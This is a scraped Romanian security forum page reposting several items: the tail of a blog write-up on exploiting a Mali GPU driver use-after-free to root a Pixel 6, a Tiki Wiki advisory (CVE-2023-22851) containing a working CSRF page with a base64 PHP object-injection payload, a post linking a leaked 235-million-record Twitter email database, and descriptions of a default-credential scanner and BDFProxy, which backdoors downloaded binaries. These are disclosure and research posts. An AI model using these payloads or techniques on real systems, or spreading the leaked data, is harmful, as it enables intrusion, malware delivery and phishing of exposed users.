(kctx->jit_alloc[ids[j]] != NULL)) { ... if (kctx->jit_alloc[ids[j]] != KBASE_RESERVED_REG_JIT_ALLOC) { ... kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]); //<----- Use of the now freed jit_alloc[ids[j]] } kctx->jit_alloc[ids[j]] = NULL; } } Amongst other things, kbase_jit_free will first free some of the backing pages in the now freed kctx->jit_alloc[ids[j]]: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive. Exploiting the bug As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably. It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered. The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl will fail and return an error. This allows me to check whether the JIT region is freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it’ll first remove its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects or not, and only start spraying the heap to replace the JIT region when it is actually freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn’t involve memory allocation, so it won’t interfere with the object replacement. This makes it perfect for testing whether the bug has been triggered. Although shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually performed by the process that is requesting the memory. So for example, if my process is mapping some memory to its address space (via mmap and then faulting the pages), and the amount of memory that I am mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this is not a hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time, the worker is indeed executed immediately on the same CPU.) This helps me to replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed within a per CPU cache, and subsequent object allocations on the same CPU will first be allocated from the CPU cache. This means that, by allocating another object of similar size on the same CPU, I’m likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is actually a rather large object that is allocated in the kmalloc-256 cache, (which is used to allocate objects of size between 256-512 bytes when kmalloc is called) instead of the kmalloc-128 cache, (which allocates objects of size less than 128 bytes), and the kmalloc-256 cache is a less used cache. This, together with the relative certainty of the CPU that frees the JIT region, allows me to reliably replace the JIT region after it is freed. Replacing the freed object Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages: void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg) { ... old_pages = kbase_reg_current_backed_size(reg); if (reg->initial_commit < old_pages) { ... u64 delta = old_pages - new_size; if (delta) { mutex_lock(&kctx->reg_lock); kbase_mem_shrink(kctx, reg, old_pages - delta); //<----- Free some pages in the region mutex_unlock(&kctx->reg_lock); } } One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would enable me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink: int kbase_mem_shrink(struct kbase_context *const kctx, struct kbase_va_region *const reg, u64 new_pages) { ... err = kbase_mem_shrink_gpu_mapping(kctx, reg, new_pages, old_pages); if (err >= 0) { /* Update all CPU mapping(s) */ kbase_mem_shrink_cpu_mapping(kctx, reg, new_pages, old_pages); kbase_free_phy_pages_helper(reg->cpu_alloc, delta); //<------- free pages in cpu_alloc if (reg->cpu_alloc != reg->gpu_alloc) kbase_free_phy_pages_helper(reg->gpu_alloc, delta); //<--- free pages in gpu_alloc In order to do so, I’d need to know the addresses of some data that I can control, so I could create a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or use techniques like the one I wrote about in the Section “The Ultimate fake object store” in my other post. But why use a fake object when you can use a real one? The JIT region that is involved in the use-after-free bug here is a kbase_va_region, which is a complex object that has multiple states. Many operations can only be performed on memory objects with a correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times. The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl that allows multiple memory regions to share the same backing pages. I’ve written about how KBASE_IOCTL_MEM_ALIAS works in more details in my previous post, but for the purpose of this exploit, the crucial point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages. To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE, so that JIT memory cannot be aliased: u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride, u64 nents, struct base_mem_aliasing_info *ai, u64 *num_pages) { ... for (i = 0; i < nents; i++) { if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) { if (ai[i].handle.basep.handle != BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE) ... } else { ... if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE) //<-- 2. goto bad_handle; /* JIT regions can't be * aliased. NO_USER_FREE flag * covers the entire lifetime * of JIT regions. The other * types of regions covered * by this flag also shall * not be aliased. ... } Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All these are valid as I’m just aliasing a normal memory region that does not have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased. If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store in this new region will be freed, but the extra mappings created in the aliased region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of having side effects that could result in a crash. The situation is now very similar to what I had in my previous post and the exploit flow from this point on is also very similar. For completeness, I’ll give an overview of how the exploit works here, but readers who are interested can take a look at more details from the Section “Breaking out of the context” onwards in that post. To recap, I now have access to the backing pages in a kbase_va_region object that is already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used: int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages, struct tagged_addr *pages, bool partial_allowed) { ... /* Get pages from this pool */ while (nr_from_pool--) { p = kbase_mem_pool_remove_locked(pool); //<------- 1. ... } ... if (i != nr_4k_pages && pool->next_pool) { /* Allocate via next pool */ err = kbase_mem_pool_alloc_pages(pool->next_pool, //<----- 2. nr_4k_pages - i, pages + i, partial_allowed); ... } else { /* Get any remaining pages from kernel */ while (i != nr_4k_pages) { p = kbase_mem_alloc_page(pool); //<------- 3. ... } ... } ... } The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel). When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator. As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, being able to write to PGD will allow me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution. In the following figure, the green block indicates the same page being reused as the PGD. To summarize, the exploit involves the following steps: Create JIT memory. Mark the JIT memory as evictable. Increase memory pressure by mapping memory to the user space via normal mmap system calls. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory. Create an alias region to the new GPU memory region that replaced the JIT memory so that the backing pages of the new GPU memory are shared with the alias region. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region is now replaced by the new memory region, this will cause kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6. will not be removed. The alias region can now be used to access the freed backing pages. Reuse the freed backing pages as PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages to the GPU address space. Map kernel code to the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux. The exploit for Pixel 6 can be found here with some setup notes. Disclosure and patch gapping At the start of the post, I mentioned that I initially reported this bug to the Android Security team, but it was later dismissed as a “Won’t fix” bug. While it is unclear to me why such a decision was made, it is perhaps worth taking a look at the wider picture instead of treating this as an isolated incident. There has been a long history of N-day vulnerabilities being exploited in the Android kernel, many of which were fixed in the upstream kernel but didn’t get ported to Android. Perhaps the most infamous of these was CVE-2019-2215 (Bad Binder), which was initially discovered by the syzkaller fuzzer in November 2017 and patched in February 2018. However, this fix was never included in an Android monthly security bulletin until it was rediscovered as an exploited in-the-wild bug in September 2019. Another exploited in-the-wild bug, CVE-2021-1048, was introduced in the upstream kernel in December 2020, and was fixed upstream a few weeks later. The patch, however, was not included in the Android Security Bulletin until November 2021, when it was discovered to be exploited in-the-wild. Yet another exploited in-the-wild vulnerability, CVE-2021-0920, was found in 2016 with details visible in a Linux kernel email thread. The report, however, was dismissed by kernel developers at the time, until it was rediscovered to be exploited in-the-wild and patched in November 2021. To be fair, these cases were patched or ignored upstream without being identified as security issues (for example, CVE-2021-0920 was ignored), making it difficult for any vendor to identify such issues before it’s too late. This again shows the importance of properly addressing security issues and recording them by assigning a CVE-ID, so that downstream users can apply the relevant security patches. Unfortunately, vendors sometimes see having security vulnerabilities in their products as a damage to their reputation and try to silently patch or downplay security issues instead. The above examples show just how serious the consequences of such a mentality can be. While Android has made improvements to keep the kernel branches more unified and up-to-date to avoid problems such as CVE-2019-2215, where the vulnerability was patched in some branches but not others, some recent disclosures highlight a rather worrying trend. On March 7th, 2022, CVE-2022-0847 (Dirty pipe) was disclosed publicly, with full details and a proof-of-concept exploit to overwrite read-only files. While the bug was patched upstream on February 23rd, 2022, with the patch merged into the Android kernel on February, 24th, 2022, the patch was not included in the Android Security Bulletin until May 2022 and the public proof-of-concept exploit still ran successfully on a Pixel 6 with the April patch. While this may look like another incident where a security bug was patched silently upstream, this case was very different. According to the disclosure timeline, the bug report was shared with the Android Security Team on February 21st, 2022, a day after it was reported to the Linux kernel. Another vulnerability, CVE-2021-39793 in the Mali driver, was patched by Arm in version r36p0 of the driver (as CVE-2022-22706), which was released on February 11th, 2022. The patch was only included in the Android Security Bulletin in March as an exploited in-the-wild bug. Yet another vulnerability, CVE-2022-20186 that I reported to the Android Security Team on January 15th, 2022, was patched by Arm in version r37p0 of the Mali driver, which was released on April 21st, 2022. The patch was only included in the Android Security Bulletin in June and a Pixel 6 running the May patch was still affected. Taking a look at security issues reported by Google’s Project Zero team, between June and July 2022, Jann Horn of Project Zero reported five security issues (2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proof of concepts, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022, (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID) after Project zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022. In all of these instances, the bugs were only patched in Android a couple months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it’s still easy to pwn Android with N-days entirely. Well, yes, entirely. Notes Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the openings to the Asterix series, which usually starts with: “The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…” Sursa: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
    1 point
  34. Pot să răspund doar la întrebări concrete, la care pot să ofer un răspuns fără să încalc termeni contractuali, de confidențialitate sau de bun simț. Asta este o opinie personală, nu pot să îți răspund la ea, dar mulțumesc pentru feedback.
    1 point
  35. Eu nu am auzit chestii de rau despre ei.
    1 point
  36. How to ban users on IPBoard platform?
    1 point
  37. Avand in vedere ca e ZiTec, cred ca da, cel putin ei asa sustin oficial: https://blog.zitec.com/kickstarting-a-tech-career-internship-zitec
    1 point
  38. Nu e pbn, continte toate site-urile din romania, de la stirileprotv, antena3, kanald, ziare.com etc etc nu poti numi pbn toate site-urile dintr o tara, sunt cateva mii
    1 point
  39. Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php. ---------------------------------------------------------------------------------------------------- Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability ---------------------------------------------------------------------------------------------------- [-] Software Link: https://tiki.org [-] Affected Versions: Version 24.1 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following: <html> <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" /> <input type="hidden" name="importAttachments" value="on" /> <input type="file" name="importFile" id="fileinput"/> </form> <script> const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg=="); const fileInput = document.getElementById("fileinput"); const dataTransfer = new DataTransfer(); const file = new File([xmlContent], "test.xml", {type: "text/xml"}); dataTransfer.items.add(file); fileInput.files = dataTransfer.files; document.forms[0].submit(); </script> </html> [-] Solution: Upgrade to version 24.2 or later. [-] Disclosure Timeline: [07/03/2022] - Vendor notified [23/08/2022] - Version 24.1 released [09/01/2023] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22851 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2023-04 Source
    1 point
  40. Daca nu ai nevoie de contabil, sigur ai de stomatolog sau broker bursier. Recomand @Checu incredere.
    1 point
  41. Twitter database leaks for free with 235,000,000 records. The database contains 235,000,000 unique records of Twitter users and their email addresses and will unfortunately lead to a lot of hacking, targeted phishing, and doxxing. This is one of the most significant leaks ever. BF: https://breached.vc/Thread-Twitter-DB-Scrape-Leak-200-Mill-Lines?highlight=twitter
    1 point
  42. Research despre companie si alte companii care apartin aceluiasi grup si Google (e.g. inurl).
    1 point
  43. Prowler Prowler is a Network Vulnerability Scanner implemented on a Raspberry Pi Cluster, first developed during Singapore Infosec Community Hackathon - HackSmith v1.0. Capabilities Scan a network (a particular subnet or a list of IP addresses) for all IP addresses associated with active network devices Determine the type of devices using fingerprinting Determine if there are any open ports on the device Associate the ports with common services Test devices against a dictionary of factory default and common credentials Notify users of security vulnerabilities through an dashboard. Dashboard tour Planned capabilities Greater variety of vulnerability assessment capabilities (webapp etc.) Select wordlist based on fingerprint Hardware Raspberry Pi Cluster HAT (with 4 * Pi Zero W) Raspberry Pi 3 Networking device Software Stack Raspbian Stretch (Controller Pi) Raspbian Stretch Lite (Worker Pi Zero) Note: For ease of setup, use the images provided by Cluster Hat! Instructions Python 3 (not tested on Python 2) Python packages see requirements.txt Ansible for managing the cluster as a whole (/playbooks) Key Python Package dispy (website) is the star of the show. It allows allows us to create a job queue that will be processed by the worker nodes. python-libnmap is the python wrapper around nmap, an open source network scanner. It allows us to scan for open ports on devices. paramiko is a python wrapper around SSH. We use it to probe SSH on devices to test for common credentials. eel is used for the web dashboard (seperate repository, here) rabbitmq (website) is used to pass the results from the cluster to the eel server that is serving the dashboard page. Ansible Playbooks For the playbooks to work, ansible must be installed (sudo pip3 install ansible). Configure the IP addresses of the nodes at /etc/ansible/hosts. WARNING: Your mileage may vary as these were only tested on my setup shutdown.yml and reboot.yml self-explanatory clone_repos.yml clone prowler and dispy repositories (required!) on the worker nodes setup_node.yml installs all required packages on the worker nodes. Does not clone the repositories! Deploying Prowler Clone the git repository: git clone https://github.com/tlkh/prowler.git Install dependencies by running sudo pip3 install -r requirements.txt on the controller Pi Run ansible-playbook playbooks/setup_node.yml to install the required packages on worker nodes. Clone the prowler and dispy repositories to the worker nodes using ansible-playbook playbooks/clone_repos.yml Run clusterhat on on the controller Pi to ensure that all Pi Zeros are powered up. Run python3 cluster.py on the controller Pi to start Prowler To edit the range of IP addresses being scanned, edit the following lines in cluster.py: test_range = [] for i in range(0, 1): for j in range(100, 200): test_range.append("172.22." + str(i) + "." + str(j)) Old Demos Cluster Scan Demonstration Jupyter Notebook Single Scan Demonstration Jupyter Notebook Try out the web dashboard here Useful Snippets To run ssh command on multiple devices, install pssh and pssh -h pssh-hosts -l username -A -i "command" To create the cluster (in compute.py): cluster = dispy.JobCluster(compute, nodes='pi0_ip', ip_addr='pi3_ip') Check connectivity: ansible all -m ping or ping p1.local -c 1 && ping p2.local -c 1 && ping p3.local -c 1 && ping p4.local -c 1 Temperature Check: /opt/vc/bin/vcgencmd measure_temp && pssh -h workers -l pi -A -i "/opt/vc/bin/vcgencmd measure_temp" | grep temp rpimonitor (how to install): Contribuitors: Faith See Wong Chi Seng Timothy Liu ABSOLUTELY NO WARRANTY WHATSOEVER! Feel free to submit issues though. Download: prowler-master.zip Source
    1 point
  44. The Backdoor Factory Proxy (BDFProxy) v0.2 For security professionals and researchers only. NOW ONLY WORKS WITH MITMPROXY >= v.0.11 To install on Kali: apt-get update apt-get install bdfproxy DerbyCon 2014 Presentation: About 18 minutes in is the BDFProxy portion. Contact the developer on: IRC: irc.freenode.net #BDFactory Twitter: @Midnite_runr This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy. Concept: Patch binaries during download ala MITM. Why: Because a lot of security tool websites still serve binaries via non-SSL/TLS means. Here's a short list: sysinternals.com Microsoft - MS Security Essentials Almost all anti-virus companies Malwarebytes Sourceforge gpg4win Wireshark etc... Yes, some of those apps are protected by self checking mechanisms. I've been working on a way to automatically bypass NSIS checks as a proof of concept. However, that does not stop the initial issue of bitflipping during download and the execution of a malicious payload. Also, BDF by default will patch out the windows PE certificate table pointer during download thereby removing the signature from the binary. Depends: Pefile - most recent ConfigObj mitmProxy - Kali Build .10 BDF - most current Capstone (part of BDF) Supported Environment: Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy. Install: BDF is in bdf/ Run the following to pull down the most recent: ./install.sh OR: git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/ If you get a certificate error, run the following: mitmproxy And exit [Ctr+C] after mitmProxy loads. Usage: Update everything before each use: ./update.sh READ THE CONFIG!!! -->bdfproxy.cfg You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You'll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don't have to kill your proxy to change settings to work with your environment. But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally. Then: ./bdf_proxy.py Here's some sweet ascii art for possible phyiscal settings of the proxy: Lan usage: <Internet>----<mitmMachine>----<userLan> Wifi usage: <Internet>----<mitmMachine>----<wifiPineapple>))) Testing: Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup. Update your config as follows: transparentProxy = None Configure FoxyProxy to use BDFProxy as a proxy. Default port in the config is 8080. Logging: We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure. Attack Scenarios (all with permission of targets): -Evil Wifi AP -Arp Redirection -Physical plant in a wiring closet -Logical plant at your favorite ISP Sursa: https://github.com/secretsquirrel/BDFProxy
    1 point
×
×
  • Create New...